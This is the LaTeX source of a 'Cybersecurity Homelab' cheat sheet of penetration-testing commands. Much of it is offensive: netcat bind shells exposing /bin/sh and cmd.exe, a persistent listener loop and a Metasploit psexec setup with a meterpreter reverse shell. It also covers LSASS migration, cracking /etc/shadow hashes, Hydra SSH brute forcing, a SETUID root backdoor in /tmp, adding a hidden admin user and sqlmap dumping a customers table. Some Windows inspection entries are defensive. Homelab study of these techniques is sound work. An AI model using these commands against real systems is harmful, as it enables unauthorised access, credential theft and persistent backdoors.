\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{nullmoniker} \pdfinfo{ /Title (cybersecurity-homelab.pdf) /Creator (Cheatography) /Author (nullmoniker) /Subject (Cybersecurity Homelab Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{A3A3A3} \definecolor{LightBackground}{HTML}{F3F3F3} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Cybersecurity Homelab Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{nullmoniker} via \textcolor{DarkBackground}{\uline{cheatography.com/148247/cs/32322/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}nullmoniker \\ \uline{cheatography.com/nullmoniker} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 4th June, 2022.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{3} \begin{tabularx}{5.377cm}{x{0.84609 cm} x{4.13091 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Nmap}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{nmap -A \textless{}target\textgreater{} -{}-reason -o \textless{}file\textgreater{}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{nmap -p port(s) target -{}-reason} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{nmap -sV -p port(s) target -{}-reason} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{nmap -p \textless{}port\textgreater{} -{}-script http-enum \textless{}target\textgreater{}} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \seqsplit{scripts:} & http-enum, http-title, smb-os-discovery, smb-brute \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{3.03597 cm} x{1.94103 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Netcat}} \tn % Row 0 \SetRowColor{LightBackground} nc -lnvp 7777 & create listener \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} nc -nv \textless{}IP\textgreater{} \textless{}Port\textgreater{} & connect \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{nc -l nvp Port -e /bin/sh} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{nc -lnvp Port -e cmd.exe} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} while {[} 1 {]}; do echo "Started"; nc -lnp {[}port{]} -e /bin/sh; done & set up persistent listener \tn % Row Count 7 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Wmic}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{Wmic process list brief} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{Wmic process where name="\textless{}process.exe\textgreater{}" list full} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{Wmic process where processid="\textless{}PID\textgreater{}" list full} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{Wmic process where processid="\textless{}PID\textgreater{}" get name,commandline,processid,parentprocessid} \tn % Row Count 5 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{Wmic process where name="\textless{}process.exe\textgreater{}" get name,commandline,processid,parentprocessid} \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{Wmic startup} \tn % Row Count 8 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Regedit and Startup}} \tn % Row 0 \SetRowColor{LightBackground} HKEY\_LOCAL\_MACHINE\textbackslash{}Software\textbackslash{}Microsoft\textbackslash{}Windows\textbackslash{}CurrentVersion\textbackslash{} & Run, Runonce, RunonceEx \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} sc query | more & Windows services \tn % Row Count 5 (+ 1) % Row 2 \SetRowColor{LightBackground} Tasklist /svc & shows Process, PID, services \tn % Row Count 7 (+ 2) % Row 3 \SetRowColor{white} Taskschd.msc & task scheduler GUI \tn % Row Count 8 (+ 1) % Row 4 \SetRowColor{LightBackground} schtasks | more & CLI show scheduled tasks \tn % Row Count 10 (+ 2) % Row 5 \SetRowColor{white} schtasks /delete /tn \textless{}taskname\textgreater{} & Delete a scheduled task \tn % Row Count 12 (+ 2) % Row 6 \SetRowColor{LightBackground} Lusrmgr.msc & local users and groups GUI \tn % Row Count 14 (+ 2) % Row 7 \SetRowColor{white} secpol.msc & local security policy GUI \tn % Row Count 16 (+ 2) % Row 8 \SetRowColor{LightBackground} & check local policies, audit policy, audit logon events \tn % Row Count 19 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{reg query \textless{}HKEY...\textgreater{} shows whats in the registry key} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{3.4839 cm} x{1.4931 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{DNS}} \tn % Row 0 \SetRowColor{LightBackground} nslookup & from Windows \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{server \textless{}IP\textgreater{}} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{ls -d target.tgt} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} dig @\textless{}IP\textgreater{} target.tgt -t AXFR & from Unix \tn % Row Count 4 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{attempt a zone transfer from a Windows System} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{search keyword type:exploit} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{use \seqsplit{exploit/windows/smb/psexec}} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{set SMBUser \textless{}admin\_user\textgreater{}} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{set SMBPass \textless{}admin\_pass\textgreater{}} \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{set SMBDomain \textless{}windows domain\textgreater{}} \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{set PAYLOAD \seqsplit{windows/meterpreter/reverse\_tcp}} \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{set LHOST} \tn % Row Count 7 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{set RHOST \textless{}target\textgreater{}} \tn % Row Count 8 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.33919 cm} x{2.63781 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Meterpreter}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{migrate -N lsass.exe} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} shell & background \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} route add \textless{}targetIP\textgreater{} \textless{}subnetMask\textgreater{} 1 & pivot through session 1 when targeting \textless{}targetIP\textgreater{} \tn % Row Count 5 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{John The Ripper}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{unshadow /etc/passwd /etc/shadow \textgreater{} /tmp/combined} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{john /tmp/combined} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{john \textless{}hashfile\textgreater{} (LANMAN Hash)} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{john -{}-format=NT \textless{}hashfile\textgreater{} (NT Hash)} \tn % Row Count 4 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{Delete john.pot when you want to restart a cracking session. otherwise, it starts where it left off} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Hydra}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{hydra -l \textless{}username\textgreater{} -p \textless{}password\textgreater{} ssh://\textless{}targetIP\textgreater{}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{hydra -l \textless{}username\textgreater{} -P \textless{}passwordList.txt\textgreater{} ssh://\textless{}targetIP\textgreater{}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{hydra -L \textless{}usernameList.txt -p \textless{}password\textgreater{} ssh://\textless{}targetIP\textgreater{}} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{SSH, SMB, FTP} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{SETUID shells}} \tn % Row 0 \SetRowColor{LightBackground} find / -uid 0 -type f -perm -4000 2\textgreater{}/dev/null & find files starting at root directory, owned by root, are a file type (not directory), and have SETUID bit set. send errors to /dev/null. \tn % Row Count 7 (+ 7) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{cp /bin/sh /tmp/backdoor} \tn % Row Count 8 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{sudo chown root:root /tmp/backdoor} \tn % Row Count 9 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{sudo chmod 4755 /tmp/backdoor} \tn % Row Count 10 (+ 1) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{/tmp/backdoor -p} \tn % Row Count 11 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{find files starting at root directory, owned by root, are a file type (not directory), and have SETUID bit set. send errors to /dev/null.} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{3.03597 cm} x{1.94103 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Windows Net, SMBclient, SSH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{net user /add \textless{}username\textgreater{} \textless{}password\textgreater{}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{net localgroup administrators /add \textless{}username\textgreater{}} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{net user username /delete} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{net use * \textbackslash{}\textbackslash{}target\textbackslash{}C\$ password /u:targetIP\textbackslash{}username} \tn % Row Count 5 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{net use * /d /y} \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{smbclient -U username -L server -m SMB3} \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{smbclient -U username //server/C\$ -m SMB3} \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{smbclient -U DOM\textbackslash{}\textbackslash{}username //server/C\$ -m SMB3} \tn % Row Count 9 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{ssh username@hostname} \tn % Row Count 10 (+ 1) % Row 9 \SetRowColor{white} scp \seqsplit{username@hostname:/path/to/file} ./ & copy to local host \tn % Row Count 12 (+ 2) % Row 10 \SetRowColor{LightBackground} scp file file username@hostname: & copy file to remote host \tn % Row Count 14 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.73735 cm} x{2.23965 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Alternate Data Streams}} \tn % Row 0 \SetRowColor{LightBackground} dir /r & show ADS in CMD \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Get-Item -Path {\emph{ -Stream }} & show ADS in Powershell \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} lads C:\textbackslash{} /S & search for ADS streams using LADS \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} lads C:\textbackslash{} /S | findstr /V "Error 1921" & filter out LADS errors \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} more \textless{} file:streamName & get ADS content in CMD \tn % Row Count 9 (+ 2) % Row 5 \SetRowColor{white} Get-Content -Path filepath -Stream streamName & get ADS content in Powershell \tn % Row Count 12 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{wget and curl}} \tn % Row 0 \SetRowColor{LightBackground} wget \textless{}URL/filename.txt\textgreater{} & download a file locally \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} wget -qO- \textless{}URL/filename.txt\textgreater{} & download and display file contents \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} curl -iI \textless{}URL/filename.txt\textgreater{} & display server header response \tn % Row Count 6 (+ 2) % Row 3 \SetRowColor{white} curl -O filename.txt \textless{}URL/filename.txt\textgreater{} & download a file locally \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} curl -{}-silent -b \seqsplit{"cookiename=cookievalue"} \textless{}URL/filename.txt\textgreater{} & download and display file, suppressing progress, with specified cookie \tn % Row Count 12 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{SQLi}} \tn % Row 0 \SetRowColor{LightBackground} sqlmap -u \seqsplit{'URL/page\¶m=1?param=2'} & always start with valid URL, in quotes \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} sqlmap -u 'http://www{[}…{]}=1?param=2' -{}-dbs & enumerate databases \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} sqlmap -u 'http://www{[}…{]}=1?param=2' -D dbname -{}-tables & enum tables in selected database dname \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} sqlmap -u 'http://www{[}…{]}=1?param=2' -D dbname -T customers -{}-dump & retrieve all rows in the customers dbname.customers table \tn % Row Count 12 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}